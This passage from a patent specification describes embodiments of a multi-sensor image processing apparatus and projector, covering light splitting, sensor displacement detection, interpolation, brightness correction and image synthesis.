and an interpolation circuit 25a which replace thedisplacement-detecting circuit 24 and the interpolation circuit 25, respectively. The second embodiment is identical to the first in all other respects. Its components identical to those of the first embodiment are therefore designated at the samereference numerals in FIG. 13 and will not described in detail in the following description. As shown in FIG. 13, the interpolation-coefficient writing circuit 28 comprises a displacement-detecting circuit 24, a coordinates-converting circuit 35, an interpolation coefficient calculator 37, and a data-address detector 41. Thecoordinates-converting circuit 35 performs the operation of the equation (10), the interpolation coefficient calculator 37 effects the operations of the equations (11) and (9), and the data-address detector 41 executes the operation of the equation (12). The circuit 37 calculates interpolation coefficients a, b, c, and d. The detector 41 detects the coordinates value of each pixel. The coefficients a, b, c, and d, and the coordinate value of the pixel are input to the interpolation circuit 25a. In the interpolation circuit 25a, the coordinate value of the pixel is stored into a data address memory 42, and the interpolation coefficients a, b, c, and d are stored into four coefficient memories 43, 44, 45, and 46, respectively. Thecircuit 25a further comprises a coordinates selector 34, a data-reading circuit 36b, and a linear interpolation circuit 38. As indicated above, the second embodiment effects the coordinate conversion of the equation (10), the interpolation-coefficient calculation of the equation (11), and the coordinates-value calculation of the equation (12) during the manufacture ofthe apparatus, and the results of these operations are stored into the data-address memory 42 and the coefficient memories 43 to 46. Hence, it is only the operation of the equation (9) that the linear interpolation circuit 38 needs to accomplish. The use of the data-address memory 42 and the coefficient memories 43 to 46, all incorporated in the interpolation circuit 25a, greatly reduce the amount of data that needs to be processed. This enables the apparatus to process, at sufficientlyhigh speed, the image signals which are sequentially generated by continuous imaging. In the second embodiment, the interpolation-coefficient writing circuit 28 may be connected to the apparatus only during the manufacture of the apparatus, and may be disconnected therefrom after the operations of the equations (10), (11) and (12)are performed and the results thereof are stored into the data-address memory 42 and the coefficient memories 43 to 46. An image processing apparatus, which is a third embodiment of this invention, will be described with reference to FIGS. 14A and 14B and FIGS. 15 to 17. The third embodiment is similar to the first embodiment shown in FIG. 6, and the samecomponents as those of the first embodiment are denoted at the same reference numerals in FIG. 17 and will not be described in detail. In the first and second embodiments, the input light representing the optical image of an object is split into two parts by means of the half prism 1a. The use of the half prism 1a is disadvantageous in that one half of the input light iswasted. In the third embodiment, to avoid wasting of the input light, one of the prisms constituting the light-splitting section has a coating on a part of its output surface as is shown in FIG. 14A. Thus, the portions of the first prism have differenttransmission coefficients. FIG. 14A shows an input light flux which is coaxial with the optical axis of the light-splitting section. The upper half (shaded part) of the flux is reflected to a CMD 8 from the coated part of the output surface of the first prism, whereas thelower half of the flux passes through the first prism and the second prism, reaching a CMD 9. On the other hand, FIG. 14B shows an input light flux whose axis deviates upwards from the optical axis of the light-splitting section. A greater upper(shaded) part of the flux is reflected to the CMD 8 from the coated part of the output surface of the first prism, whereas the smaller lower half of the flux passes through the first prism and the second prism, forming a small part of the input image onthe upper edge portion of the CMD 9. The amount of light input to the light-splitting section is proportional to the area of the output aperture of the objective lens. Thus, when the input light flux is coaxial with the optical axis of the light-splitting section as is shown inFIG. 14A, the light distributions in the imaging areas of the CMDs 8 and 9 are symmetrical with respect to the optical axis of the light-splitting section, as is illustrated in FIG. 15. As is evident from FIG. 15, the light amount at the optical axis ofthe light-splitting section is equal to the amount applied to the CMDs through the half prism 1a in the first and second embodiments. The light distributions in the imaging areas of the CMDs 8 and 9 are different, particularly in the overlap areasthereof. From the light distributions in the imaging areas of the CMDs 8 and 9 which are different, a displacement, if any, of the imaging area of one CMD with respect to that of the other CMD cannot be detected correctly. Namely, the displacementdetected is erroneous. Further, if the light distributions on the CMDs differ, the image formed by the apparatus will have brightness distortion. In order to prevent such brightness distortion, some measures must be taken to render the lightdistributions on the CMDs equal. In the third embodiment, use is made of light-amount correcting circuits 47 and 48 as shown in FIG. 17. These circuits 47 and 48 amplify input image signals originated from the CMDs 8 and 9, making the light distributions on the CMDs equal toeach other as shown in FIG. 16. In other words, the circuits 47 and 48 apply an inverse function to the different light distributions on the CMDs 8 and 9. The light-amount correcting circuits 47 and 48 may be look-up tables. The light-splittingsection 1b of the third embodiment comprises two prisms. One of the prisms has a coating on a part of its output surface as is shown in FIG. 14A and consists of two portions having different transmission coefficients. Consisting of two portions with different transmission coefficients, this prism reduces the loss of input light to a minimum, whereby the apparatus is made suitable for photographing dark objects. In the third embodiment, the prisms have eachtwo parts having greatly different transmission coefficients. Each of them may be replaced by a prism which has such a coating that its transmission coefficient gradually changes in one direction. An image processing apparatus, which is a fourth embodiment of the invention, will be described with reference to FIG. 18 and FIGS. 19A, 19B, and 19C. The fourth embodiment is also similar to the first embodiment (FIG. 6). The componentsidentical to those of the first embodiment are denoted at the same reference numerals in FIG. 18 and will not be described in detail. FIGS. 19A, 19B, and 19C explain how a light flux applied from an objective lens 6 is applied through the separator lenses 1c, forming an image on CMDs 8 and 9 in various manners. To be more specific, FIG. 19A shows a light flux applied throughthe lenses 1c to the CMDs 8 and 9, exactly along the optical axis of the lens 6. FIG. 19B shows a light flux extending along a line inclined to the optical axis of the objective lens 6, forming an image on the upper edge portion of the CMD 8 only. FIG.19C shows a light flux extending along a line parallel to and deviating downward from the optical axis of the lens 6, forming an image on the upper edge portion of the CMD 9 only. When the input light flux is applied as shown in FIG. 19A or 19C, thelenses 1c split the flux into two parts, and these parts of the flux form images on both CMDs 8 and 9 or on the CMD 9 only, which overlap in part. A light shield 50 is arranged between the separator lenses 1c and the CMDs 8 and 9, extending in ahorizontal plane containing the optical axis of the lens 6. Hence, the shield 50 prevents mixing of the two flux parts. As can be understood from FIGS. 19B and 19C, the light distributions on the CMDs 8 and 9 will differ unless the light flux is applied along the optical axis of the objective lens 6. The fourth embodiment therefore has two light-amount correctingcircuits 47 and 48 of the same type used in the third embodiment (FIG. 17). As indicated above, in the image processing apparatus according to the fourth embodiment of the invention, the separator lenses 1c are used, in place of prisms, to split the input light flux into two parts. Since the lenses 1c are smaller thanprisms, the light-splitting section of the apparatus can easily be made small. Another image processing apparatus, which is a fifth embodiment of this invention, will be described with reference to FIGS. 20 and 21. As is evident from FIG. 20, the fifth embodiment is similar to the embodiment of FIG. 18, and the samecomponents as those of the embodiment of FIG. 18 are denoted at the same reference numerals in FIG. 20 and will not be described in detail. As has been described, in the first embodiment, the values interpolated for the pixels d.sub.ij of one half of the display screen (i=u+1 to u+v, j=1 to w) are interpolated, whereas the values for the pixels of the other half of the screen are thepixel signals which the CMD 8 has output. The interpolated values of the screen pixels may deteriorated in some case, as compared to those which are the pixel signals output by the CMD 8, and the left and right halves of the image the first embodimentforms may differ in resolution. The fifth embodiment is designed to form a single image of uniform resolution. As FIG. 21 shows, CMDs 8 and 9 (FIG. 20) are so positioned that their imaging areas incline at the same angle to a display area of a display section 31 (FIG. 20). Thus, as is shown in FIG. 21, if the imaging area of the CMD 8 is inclined at angle .theta. to that of the CMD 9, the imaging areas of the CMDs 8 and 9 incline at an angle of .theta./2 to the display area. In this case, the values of the screen pixelsd.sub.ij (i=1 to (u+v)/2, j=1 to w) defining the half display area left of the broken line are interpolated from the pixel signals output by the CMD 8, whereas the values of the screen pixels d.sub.ij (i=(u+u)/2 to u+v, j=1 to w) defining the halfdisplay area on the right of the broken line are interpolated from the pixel signals output by the CMD 9. The fifth embodiment has a CMD rotating mechanism 49. The mechanism 49 rotates the CMDs 8 and 9, inclining their imaging areas at the same angle to the display area, if the imaging areas of the CMDs 8 and 9 incline to the display area when theimage processing apparatus is held with its display area extending horizontally. The angle by which the mechanism 49 rotates either imaging area to the display area is determined by the conversion factors R and S which have been detected by adisplacement-detecting circuit 24. The fifth embodiment further comprises an additional interpolation circuit 25, which performs interpolation on the pixel signals output by the CMD 8 to calculate the values of the screen pixels defining the left halfdisplay area (FIG. 20). Since the CMD rotating mechanism 49 rotates the CMDs 8 and 9, if necessary, thereby inclining their imaging areas at the same angle to the display area, the image processing apparatus can form an image which is uniform in resolution. The imagingareas of the CMDs need not be inclined at the same angle to the display area; an image can be formed which has a substantially uniform resolution. It should be noted that the CMD rotating mechanism 49, which characterizes the fifth embodiment, may be incorporated in the first to fourth embodiments, as well. An image processing apparatus, which is a sixth embodiment of the invention, will be described with reference to FIGS. 22A and 22B. As may be understood from FIG. 22a, the sixth embodiment has components similar to those of the first embodimentshown in FIG. 6. Therefore, the same components as those of the first embodiment are denoted at the same reference numerals in FIG. 22A and will not be described in detail. As is evident from FIG. 22A, four CMDs 51, 52, 53, and 54, are provided each having a 1000.times.1000 pixel matrix. Each CMD has many as pixels as a general-purpose NTSC imaging device. Hence, the CMDs 51 to 54 can be manufactured with a muchhigher yield than HDTV imaging devices which have a 1920.times.1035 pixel matrix. As FIG. 22B shows, the CMDs 51 to 54 are mounted on a half prism 1d and juxtaposed with the CMD 51 used as positional reference, such that their imaging areas overlap atregions a, b, and c. Like any embodiment described above, the sixth embodiment has a displacement-detecting circuit 24. The circuit 24 detects the displacements of the CMDs 52, 53, and 54, each in the form of conversion factors S and R (i.e., displacement S androtation angle R), from the image signals representing the overlap regions a, b, and c. The three displacement data items, each consisting of the factors S and R, are input to three interpolation circuits 25, respectively. In the sixth embodiment, the half prism 1d is used as light-splitting section 1. Nonetheless, the half prism 1d may be replaced by two such prisms as used in the third embodiment, one which has a coating on a part of its output surface andconsists of two portions having different transmission coefficients. Further, each of the interpolation circuits 25 may have built-in coefficient memories as in the second embodiment which is shown in FIG. 13. Another image processing apparatus, which is a seventh embodiment of the invention, will be described. The seventh embodiment is identical to the six embodiment (FIG. 22A), except in that its light-splitting section is of any one of the typesillustrated in FIGS. 23A, 23B, 23C, and 23D and differs from that of the sixth embodiment which is a half prism 1d on which four CMDs are mounted. FIG. 23A shows the first type of the light-splitting section 1 which comprises two wedge-shaped prisms 60 and 61 and a beam splitter 63. The prisms 60 and 61 and the beam splitter 63 cooperate, splitting the input light into four parts. Theparts of the input light are applied to CMDs 55, 56, 57, and 58, forming four parts of an object image on the imaging areas of the CMDs 55 to 58, respectively, as is illustrated in FIG. 26. FIG. 24A is a side view of the light-splitting section 1 shown in FIG. 23A, and FIG. 24B is a plan view thereof. As clearly illustrated in FIGS. 24A and 24B, the wedge-shaped prisms 60 and 61 split the input light into two parts, each of whichis split by the beam splitter 63 into two parts. As a result, the input light is divided into four parts. The beam splitter 62 is formed of two right-angle prisms connected together. As shown in FIG. 24A, a total-reflection mirror coating is appliedto the upper half of the interface between the right-angle prisms. FIG. 23B shows the second type of the light-splitting section 1 which differs from the type of FIG. 23A, in that two eccentric lenses 64 and 65 are used in place of the two wedge-shaped prisms 60 and 61. Unlike the prisms 60 and 61 which deflecta light flux, the eccentric lenses 64 and 65 not only deflect a light flux but also form an image. The objective lens 6 through which the input light is applied to the eccentric lenses 64 and 65 may be that type which emits an afocal flux (see FIGS. 25And 25B). The light-splitting section 1 of the second type (FIG. 23B) need not be positioned so precisely with respect to the objective lens 6, owing to the use of the eccentric lenses 64 and 65. This facilitates the assembling of the image processingapparatus. Both eccentric lenses 64 and 65 are achromatic doublets, but can be lenses of any other types. FIG. 23C shows the third type of the light-splitting section 1 which comprises four wedge-shaped prisms 66, 67, 68, and 69. These lenses 66 to 69 are connected, side to side, forming a 2.times.2 matrix which has a concave at the center. Theinput light applied via the objective lens 6 onto the 2.times.2 matrix is divided into four parts, i.e., an upper-left part, a lower-left part, and an upper-right part, and a lower-right part. Each of the wedge-shaped prisms is an achromatic prismconsisting of two glass components which have different refraction indices. It is desirable that a telecenteric system be located at the output of the objective lens 6, to prevent distortion of the image which would otherwise occur due to the fluxrefraction caused by the wedge-shaped lens 66 to 69. Hence, the telecenteric system serves to accomplish good image synthesis. FIG. 23D shows the fourth type of the light-splitting section 1 which comprises four eccentric lenses 70, 71, 72, and 73 which are connected, side to side, forming a 2.times.2 matrix. It is desirable that this light-splitting section 1 be usedin combination with an objective lens 6 which emits an afocal flux. The seventh embodiment, which has a light-splitting section comprising prisms or lenses, needs light-amount correcting circuits of the type described above. As may be understood from the above description, the seventh embodiment is an image processing apparatus which has four solid-state imaging devices. The imaging devices are not restricted to CMDs. Needless to say, they may be CCDs or AMIs. IfCCDs for use in NTSCs, which are generally used imaging devices and have 768.times.480 pixels each, are utilized in the seventh embodiment, the seventh embodiment will form an image of resolution as high as about 1400.times.800 pixels. Alternatively,four imaging devices for use in PALs, each having 820.times.640 pixels, may be employed. In this case, the seventh embodiment will form an image of higher resolution. An image processing apparatus, which is an eighth embodiment of this invention, will be described with reference to FIG. 27. This embodiment is identical to the first embodiment (FIG. 6), except for the features which will be described below. The seventh embodiment has a light-splitting section which comprises four imaging devices. According to the present invention, however, the number of imaging devices used is not limited to four at all. The eighth embodiment of the invention ischaracterized in that a large number of lenses and a large number of imaging devices, that is, a lens array 74 and a CMD array 75, as is clearly shown in FIG. 27. The lenses and the CMDs have one-to-one relation, and the CMDs have their imaging areasoverlapping in part. The lens array 74 has a light shield formed on its entire surfaces, except for the lenses. The lens array 74 can be produced at low cost by means of, for example, press-processing. The imaging devices used in the eighth embodiment are not restricted to CMDS. Rather, they may be CCDs, MOS devices, or the like. It will now be explained how the imaging devices are positioned in each of the fourth to eighth embodiments described above. In the fourth to eighth embodiments, the CMDs are located close to one another and cannot be located at such positionsas shown in FIGS. 19A to 19C. Thus, they are positioned by one of various methods which will be described with reference to FIGS. 28 to 32 and FIGS. 33A to 33C, and FIG. 34. FIGS. 28 and 29 are a plan view and a sectional view, respectively, explaining the first method of positioning CMDs. In this method, CMDs 81 and 82 are mounted, in the form of bare chips, on a ceramic substrate 80 as is shown in FIG. 28. As isbest shown in FIG. 29, a sectional view taken along line 29--29 in FIG. 28, the CMDs 81 and 82 are set in two square recesses formed in the surface of the ceramic substrate 80 and fixed with adhesive 83. The rims of either square recess have been planedoff, so that the adhesive 83 is applied in sufficient quantity. The recesses are positioned and formed so precisely that the CMDs 81 and 82 are positioned with sufficient precision when they are set in the recesses. The electrodes of the CMDs 81 and 82are bonded to the electrodes formed on the ceramic substrate 80, respectively. The electrodes on the substrate 80 are, in turn, connected to terminals 85 formed at the edges of the substrate 80 for electrically connecting the CMDs 81 and 82 to externalcomponents. As shown in FIG. 30, the terminals 85 may protrude downward from the edges of the ceramic substrate 80. The square recesses made in the surface of the substrate 80 not only serve the purpose of positioning the CMDs 81 and 82 with required precision but also they serve to provide a broad effective imaging area. The adhesive 83 is applied to thesides of each CMD as shown in FIG. 29, not to the bottom of the CMD, so that the position of the CMD may be adjusted with respect to the optical axis of the light-splitting section. Were the adhesive 83 applied to the bottom of the CMD, the CMD mighttilt or move to assume an undesirable position with respect to the optical axis of the light-splitting section. Each CMD may be fastened to the ceramic substrate 80 in another way. As FIG. 29 shows, a hole 87 may be in the substrate 80 bored from the lower surface thereof, and adhesive 88 may be applied in the hole. This method of securing the CMD to thesubstrate 80 is advantageous in two respects. First, it minimizes the risk that the adhesive should cover the light-receiving surface of the CMD. Second, much care need not be taken to apply the adhesive 88. FIG. 31 is a cross-sectional view, explaining the second method of positioning CMDs. In the second method, a ceramic substrate 80 is bonded to a prism or a quartz filter (not shown) by means of spacers 90 mounted on both edges of the substrate80. As a result, the substrate 80 is spaced away from the prism or the filter. Hence, no load is exerted from the prism or filter on the bonding wires 91 formed on the substrate 80, provided that the height H of the spacers 90 is greater than that h ofthe bonding wires 91. FIG. 32 is a plan view, explaining the third method of positioning bare CMDs. This method is to use a substrate 80 having rectangular recesses in its surface. Bare CMD chips 82 are placed in the recesses, respectively, each abutted on one edgeof the recess and thereby positioned in the horizontal direction. The chips 82, thus positioned, are fixed to the substrate 80 by using adhesive. FIGS. 33A to 33C explain the fourth method of positioning CMDs, which is employed to manufacture the image processing apparatus according to the six embodiment. FIG. 33A is a side view, FIG. 33B a front view seen in the direction of arrow B inFIG. 33A, and FIG. 33C a bottom view seen in the direction of arrow A in FIG. 33A. As shown in FIG. 33C, spacers 90 are mounted on a substrate 80, thereby protecting the bonding wires 91. FIG. 34 is a side view, explaining the fifth method of positioning CMDs. In this method, two ceramic substrate 80 are sutured to a backing member 92 which has a right-angle L cross section. Spacers 90 are mounted on the substrates 80, and ahalf prism 93 is abutted on the spacers 90. Hence, the half prism 93 is secured, at its two adjoining sides, to the ceramic substrates 80 and spaced away therefrom by the height H of the spacers 90. Another image processing apparatus, which is a ninth embodiment of the invention, will be described with reference to FIG. 35A. As a comparison between FIG. 17 and FIG. 35 may reveal, the ninth embodiment is similar to the third embodiment butdifferent in that an image-synthesizing circuit 121. Therefore, the same components as those of the third embodiment (FIG. 17) are denoted at the same reference numerals in FIG. 35A and will not be described in detail. The image-synthesizing circuit 121 has the structure shown in FIG. 36. The circuit 121 comprises a pixel-value converter 122 and a pixel selector 123. The value f of an input pixel and the value g of another input pixel to be combined with thefirst-mentioned pixel are input to both the converter 122 and the selector 123. The pixel selector 123 selects some pixels which are located near an overlap region, in accordance with the vector (coordinate value) X.sub.1 representing the position of anoutput pixel. The pixel-value converter 122 converts the input values of the two pixels so as to display an image which has no discontinuity. More precisely, as FIG. 37 illustrates, the converter 122 converts the input values in accordance with thepositions the pixels assume within an overlap region. Alternatively, the image-synthesizing circuit 121 may have the structure shown in FIG. 38. That is, the circuit 121 may comprise a coefficient-setting circuit 124, two multipliers 125a and 125b, and an adder 126. The circuit 124 sets weightingcoefficients a and b for two input pixel values f and g. The multiplier 125a multiplies the pixel value f by the weighting coefficient a, and the multiplier 125b multiplies the pixel value g by the weighting coefficient b. The adder 126 adds the outputsof the multipliers 125a, generating the sum, (fa+gb), which is input as an output pixel value to the frame memory 30 (FIG. 35A). The coefficient-setting circuit 124 sets the coefficients for either pixel at a value of "1.0" if the pixel is located outside the overlap region and at a value linearly ranging from "0.0" to "1.0" if the pixel is located in the overlap region. In FIG. 39, X.sub.1 is the ordinate in the direction of combining image parts, and P.sub.2 -P.sub.1 is the length of the overlap region. As may be understood from FIGS. 38 and 39, the circuit 121 shown in FIG. 38 does not change the input pixel values f and g without changing them if the pixels are located outside the overlap region. If the pixels are located in the overlapregion, the circuit 121 linearly changes the weighting coefficients a and b, multiplies the values f and g by the coefficients a and b, respectively, obtaining fa and gb, and adds the values fa and gb, and outputs the sum (fa+and gb) as an output pixelvalue. Hence, the resultant image has no brightness discontinuity which would otherwise result from the difference in sensitivity between the imaging devices. Also the image-synthesizing circuit 121 can reduce geometrical discontinuity, if any, thatoccurs in the overlap region due to the correlation and the interpolation which the displacement-detecting circuit 24 and the interpolation circuit 25 produce. Thus can the circuit 121 decrease, to some degree, the brightness discontinuity andgeometrical discontinuity in the vicinity of the overlap region. Once the displacement-detecting circuit 24 has detected the displacement, the light-amount correcting circuits 47 and 48 may be removed so that the image-synthesizing circuit 121 can bemade simple, comprising only an adder as is illustrated in FIG. 35B. This is because, the circuit 121 no longer needs to change the coefficients a and b linearly, since the light amounts on the imaging areas of the CMDs gradually change in the overlapregion as is shown in FIG. 15. To reduce the brightness discontinuity further, the bias gains of the SPs (Signal Processors) 20 and 21 may be adjusted. An image processing apparatus, which is a tenth embodiment of the invention, will be described with reference to FIG. 40. The tenth embodiment is identical to the ninth embodiment (FIG. 35A), except that a edge-emphasizing circuit 127 isconnected between the output of an interpolation circuit 25 and an image-synthesizing circuit 121. The circuit 127 is designed to restore the quality of an image which has been deteriorated due to the interpolation effected by the interpolation circuit25. The same components as those of the ninth embodiment are denoted at the same reference numerals in FIG. 40, and only the characterizing features of the tenth embodiment will be described in detail. The edge-emphasizing circuit 127 calculates a Laplacian by using the local operator of a digital filter or the like. For instance, the circuit 127 calculates a Laplacian from an original image. That is: where .omega. is a constant (see FIG. 42D), .Fourier..sup.2 is a Laplace operator. The Laplace operator used here is, for example, the operators of FIGS. 42A, 42B, and 42C. Alternatively, the following selective image-emphasizing method may beperformed: where h(x,y) is, for example, an operator for detecting lines forming the input image. Another method of emphasizing the frame is to used a high-pass filter. To be more specific, the input image data is subjected to Fourier transformation and then input to the high-pass filter. The filter emphasizes the high-frequency componentof the image data, performing inverse Fourier transformation on the input image data. In order to emphasize the input image uniformly, the edge-emphasis may be performed after shifting each pixel of the reference image by a predetermined distance (e.g., 1/2 pixel width, 1/3 pixel width, or the like), interpolating the pixel, andinputting the pixel to the image-synthesizing circuit 121. FIG. 41 shows a modification of the tenth embodiment (FIG. 40) in which an edge-emphasizing circuit 127 is connected to the output of an image-synthesizing circuit 121 so that the synthesizedimage data output by the circuit 121 may be edge-emphasized uniformly. An image processing apparatus, which is an eleventh embodiment of the invention, will be described with reference to FIGS. 43 and 44, FIGS. 45A to 45C, and FIGS. 46A and 46B. As can be understood from FIGS. 43 and 45 which show the eleventhembodiment, the embodiment is characterized in that the displacements of CMDs 8 and 9 are detected by using a reference image which has such a specific pattern as shown in FIGS. 45A, 45B, or 45C. If the case of the image pattern of FIG. 45A, thepositions of the intersections of the crosses are measured with high precision. In the case of the pattern of FIG. 45B, the positions of the dots are measured with high precision. In the case of the pattern image of FIG. 45C, the positions of theintersections of the lines are measured with high precision. The reference image is photographed, whereby the CMDs 8 and 9 generate image data items representing a left half-image and a right half-image, respectively, as can be understood from FIG. 43. The data items representing these half-images areinput to reference pattern-detecting and displacement-calculating circuits 130 and 131, respectively. The circuits 130 and 131 detect the half-images of the reference pattern and calculate the displacements (each consisting of a shift distance and arotation angle) of the half-images, i.e., the displacements of the CMDs 8 and 9, from the data representing the positions of the intersections of the crosses or lines defining the image patterns (45A, 45B, or 45C). The displacements, thus calculated,are stored into displacement memories 132 and 133. Then, the displacements stored in the memories 132 and 133 are processed in the same way as in the tenth embodiment, as can be understood from FIG. 44. Various methods can be utilized to detect the reference patterns. To detect the pattern of FIG. 45A or 45C, the vicinity of each line may be tracked. To detect the pattern of FIG. 45B, the center of each dot may be detected. Many patternsother than those of FIGS. 45A, 45B and 45C can be used in the eleventh embodiment. Owing to the use of a reference image, the displacements of the CMDs 8 and 9 can be detected even if the half-images have each so narrow an overlap region that any correlation cannot help detect the displacements of the corresponding CMD. Inthis respect the eleventh embodiment is advantageous. Another image processing apparatus, which is a twelfth embodiment of the invention, will be described with reference to FIGS. 46A and 46B, FIG. 47, and FIGS. 48A and 48B. As is evident from FIG. 47, the embodiment is characterized by the use ofa reference pattern filter 135 through which to apply an optical image of an object to an objective lens 6. The reference pattern filter 135 is either the type shown in FIG. 46A or the type shown in FIG. 46B. The pattern filter of FIG. 46A has a reference pattern which consists of two crosses located at the upper and lower portions of the overlapregion, respectively. The pattern filter of FIG. 46B has a reference pattern which consists of two dots located at the upper and lower portions of the overlap region, respectively. The reference pattern of either type is read along with the input imagehalves. As FIG. 47 shows, the twelfth embodiment has a reference pattern-detecting and displacement-calculating circuit 136 which detects the reference pattern from the upper and lower edge portions of the overlap region. More specifically, the circuit136 detects the reference pattern of FIG. 46A by tracking the vicinity of each of the lines forming the crosses, and detects the reference pattern of FIG. 46B by detecting the center of each dot. The circuit 136 determines the displacements of the leftand right halves of the input image from the reference pattern. Thereafter, the same sequence of operations is carried out as in the tenth embodiment. The reference pattern filter 135 is useful and effective, particularly in the case where the inputimage is one reproduced from silver salt film. The twelfth embodiment can fast determine the positional relation between the left and right halves of the input image. Since the reference pattern filter 135 is used, the relative positions of the image halves can be detected more accuratelythan otherwise. The filter 135 may be removed from the optical path of the objective lens 6, thereby modifying the system structure quite easily. An image processing apparatus according to a thirteenth embodiment of the invention will be described with reference to FIGS. 48A and 48B and FIG. 49. This embodiment is identical to the tenth embodiment (FIG. 40), except that a rotation-angledetecting circuit 120 and a rotational interpolation circuit 123 are used so that three or more image parts may be combined into a single image. The thirteenth embodiment is designed to prevent erroneous detection of the correlation among images even ifthere are many images to be combined and one image is greatly rotated with respect to another as is shown in FIG. 48A. The rotation angle R detected by a displacement-detecting circuit 24 is input to the rotation-angle detecting circuit 120. From the angle R, the circuit 120 determines whether or not the synthesized image output by an image-synthesizing circuit7 should be processed by the rotational interpolation circuit 123. To be more precise, the circuit 120 connects the movable contact of a selector circuit 121 to the fixed contact A thereof if the angle R is greater than a threshold value as is shown inFIG. 48A. In this case, the synthesized image is input to the rotational interpolation circuit 123. The circuit 123 rotates the image by angle of -R as is illustrated in FIG. 48B, and then combines the image with a third image. The resultant image,i.e., a combination of three images, is stored into a frame memory 30. If the angle R is equal to or less the threshold value, the rotation-angle detecting circuit 120 connects the movable contact of a selector circuit 121 to the fixed contact B thereof. In this case, the synthesized image is stored directly intothe frame memory 30. When the thirteenth embodiment is employed to combine three or more images into a single image, the rotation-angle detecting circuit 120, the selector circuit 121, and the rotational interpolation circuit 123 cooperate to prevent erroneouscorrelation of images, i.e., mis-matching of images. Another image processing apparatus, which is a fourteenth embodiment of the invention, will be described with reference to FIGS. 50A and 50B and FIG. 51. The fourteenth embodiment is identical to the tenth embodiment (FIG. 40), except that acircuit 125 is used which is designed to detect the ends of a border line. This embodiment is utilized to combine three or more images into one image. If there are many images to combine, the right edge of the region over which a first image adjoins a second image may incline as shown in FIG. 50A, and an undesired portion may be formed when the second image is combined with a third image by theprocess described with reference to FIGS. 38 and 39 since the center of the adjoining region is used as the center in said process. The fourteenth embodiment is designed to prevent the forming of such an undesired portion. As is shown in FIG. 51, the data representing a left image is supplied to the circuit 125. The circuit 125 detects ends A and B of the right order line of the image. The coordinates values of the end A, whose y-coordinate is less than that ofthe end B, is input to an image-synthesizing circuit 7. The circuit 7 uses the y-coordinate of the end A, defining the right edge of the region over which the second and the third image adjoin as shown in FIGS. 50A and 50B. Then, as FIG. 50B shows, thecircuit 7 combine the synthesized image with the next image such that the point A defines the right edge of the adjoining region and the adjoining region is positioned with its center line passing a midpoint between the point A and the left edge of theoverlap region. In the fourteenth embodiment, the circuit 125 detects the ends A and B of the right border line of the left image, and the image-synthesizing circuit 7 uses the y-coordinate of the end A which is less than than that of the end B, defining theright edge of the adjoining region. As a result of this, an undesired portion is eliminated from the adjoining region. Another image processing apparatus according to a fifteenth embodiment of the present invention will be described, with reference to FIGS. 52, 53, and 54. As is shown in FIG. 53, the fifteenth embodiment comprises 16 CMDs, a first-type synthesissection, and second-type synthesis sections. Each CMD has a 4000.times.500 pixel matrix and outputs image data showing an image overlapping the image formed by another CMD for about 60-pixel distance. The synthesis sections combine 16 image data itemsoutput by these CMDs into a single image having resolution as high as 4000.times.6000 which is the resolution achieved by silver-salt film. The first-type synthesis section has the structure shown in FIG. 52. Each of the second-type synthesis sections has the structure shown in FIG. 54. Each second-type synthesis section is connected to receive two inputs. The first input is animage signal supplied from a CMD, and the second input is the image data read from the frame memory 30 of the preceding second-type synthesis section. The second input is input directly to a displacement-detecting circuit 24. Each second-type synthesissection has a circuit 125 for eliminating an undesired portion of the adjoining region of a synthesized input image. The circuit 125 serves to eliminate an undesired portion from the adjoining region of a synthesized image. As can be understood from FIG. 53, the image signals the 16 CMDs have generated are processed in 16 image-synthesizing steps. The image processing apparatus according to the fifteenth embodiment can, therefore, form an image having highresolution comparable with the resolution of 4000.times.6000 which is accomplished by silver-salt film. An image processing apparatus, which is a sixteenth embodiment of the invention, will be described with reference to FIGS. 55 and 56. As is evident from FIG. 55, this embodiment is similar to the fifteenth embodiment (FIG. 53), comprising 16CMDs, first-type synthesis sections, and third-type synthesis sections. The first-type synthesis sections are identical to the first-type synthesis section incorporated in the fifteenth embodiment and shown in detail in FIG. 52. The third-typesynthesis sections are identical and have the structure illustrated in FIG. 56. In each of the third synthesis sections, the two data items read from the frame memories 30 of the preceding two synthesis sections are input to the displacement-detecting circuit 24. Each third synthesis section has a circuit 125 foreliminating an undesired portion of the adjoining region of a synthesized input image. The sixteenth embodiment performs many image syntheses in parallel to shorten the time for forming a synthesized image. More specifically, it produces a synthesized image in four sequential steps only, whereas the fifteenth embodiment forms asynthesized image in 15 sequential steps. Obviously, the sixteenth embodiment can effect image-synthesizing faster than the fifteenth embodiment. In the fifteenth and sixteenth embodiments, 16 CMDs each having 4000.times.500 pixels are utilized. Nonetheless, more or less imaging devices of having the same number of pixels or a different number of pixels may be incorporated, if necessary,in either embodiment. A projector, which is a seventeenth embodiment of this invention, will be described with reference to FIGS. 57 to 62. As shown in FIG. 57, the projector 126 is designed to project a plurality of images to a screen 127, which are combined into asingle image on the screen 127. As is shown in FIG. 58, the projector 126 has a half prism 128 and three LCDs (Liquid-Crystal Displays) 129, 130, and 131. The LCDs display images, which are projected onto the screen 127 and combined thereon into asingle image. As will be explained, the projector 126 can form a combined image with virtually no discontinuity even if the LCDs 129, 130, and 131 are not positioned precisely. As shown in FIG. 59, the LDCs 129, 130, 131 are mounted on the half prism 128. The are so positioned that the images projected from them will be combined on the screen 127 into a single image which has overlap regions. A quartz filter 132 isplaced in front of the light-emitting surface of the half prism 128. The filter 132 functions as a low-pass filter for preventing the individual pixels of each LCD from being visualized on the screen 127 to degrade the quality of the projected image. As is shown in FIG. 58, the seventeenth embodiment has an S,R memory 133 for storing the displacements (i.e., a distance S and a rotation angle R) of the LCD 129, 130, and 131 which are determined in a specific method, which will be describedlater. Video signals, or image data representing an image to form on the screen 127 is stored into the frame memory 30. The image data is divided into three data items representing three images which the LCDs 129, 130, and 131 are to display. Thethree data items are input to the interpolation circuits 134, 135, 136, respectively. The circuits 134, 135, and 136 execute interpolation on the input data items in accordance with the displacement data read from the S,R memory 133, so that the dividedimages projected onto the screen 127 from the LCDs 129, 130, and 131 form a single image with no discontinuity. The interpolated data items are supplied to multipliers 137, 138, and 139, respectively. The weighting coefficient calculator 140 calculates weighting coefficients in the same way as in the ninth embodiment, as has been explained with referenceto FIG. 39. The weighting coefficients are supplied to the multipliers 137, 138, and 139. The multipliers 137, 148, and 139 multiply those pixel signals of the interpolated data items which represent the overlap regions of three images to be projectedonto the screen 127 by the weighting coefficients supplied from the calculator 140. The brightness of each overlap region will therefore be adjusted. All pixel signals output from the multiplier 137 are stored into the memory 141; all pixel signalsoutput from the multiplier 138 into the memory 142; and all pixel signals output from the multiplier 139 into the memory 143. The pixel signals read from the memory 141 are input to the D/A converter 144; the pixel 